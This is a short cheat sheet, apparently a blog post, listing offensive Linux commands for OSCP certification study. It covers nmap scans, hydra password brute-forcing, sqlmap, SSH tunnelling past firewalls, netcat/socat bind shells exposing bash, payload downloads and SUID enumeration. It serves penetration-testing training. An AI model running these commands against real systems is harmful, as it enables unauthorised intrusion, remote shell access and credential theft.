Top 10 commands to pass the OSCP certification (Updated!)
Try harder and get the d*** certification!
Penetration testers often use various Linux commands for reconnaissance, vulnerability assessment, exploitation, and post-exploitation.
Here are ten important Linux commands for penetration testers who want to pass the OSCP certification at the first attempt:
nmap / us (unicornscan): Port scanners for network discovery and security auditing.
nmap -sS -p- $IP
nmap --script=snmp-brute $IP
nmap --script default,safe $IP
us -mT -Iv $IP:a -r 3000 -R 3 && us -mU -Iv $IP:a -r 3000 -R 3
enum4linux: Tool for enumerating information from Windows and Samba systems.
enum4linux -a <target>
ffuf: Web fuzzer for brute-forcing files and directories on a target.
ffuf -w /path/to/wordlist -u https://target/FUZZ
ffuf --input-cmd 'radamsa --seed $FFUF_NUM example1.txt example2.txt' -H "Content-Type: application/json" -X POST -u https://ffuf.io.fi/FUZZ -mc all -fc 400
hydra: Online password brute-forcing tool supporting many network protocols.
hydra -l <username> -P <password-list> <target> <protocol>
sqlmap: Automated SQL injection and database takeover tool.
sqlmap -u "http://<target>/page.php?id=1" --dbs
metasploit-framework: Framework for developing, testing, and using exploit code.
msfconsole
ssh: Tunnel connections from a compromised machine to your own, bypassing firewall restrictions:
ssh -L <localhost port>:<remote IP>:<remote port> $IP
ssh -R <server side port>:<localhost>:<local port> $IP
ssh -D <LOCAL PROXY PORT> -p <REMOTE PORT> <TARGET>
netcat (nc) / ncat / pwncat / socat: Networking utilities for reading and writing data across network connections.
nc -nvv -lp 8080
nc -nvvlp 8989 -e /bin/bash
pwncat -l -e '/bin/bash' 8080 -k
socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
wget / curl: Download files from the internet, useful for transferring payloads.
wget http://$URL/$FILE
curl -o file.bin -k http://$URL/$FILE
find: Search for files and directories based on various criteria.
find / -perm -4000 -ls 2> /dev/null   # SUID binaries
find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null   # world-writable files
find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null   # world-writable directories
find / -name "*.txt" -ls 2> /dev/null   # text files
find / -name "*.log" -ls 2> /dev/null   # log files
These commands are just a starting point, and the usage may vary based on the specific scenario and target environment.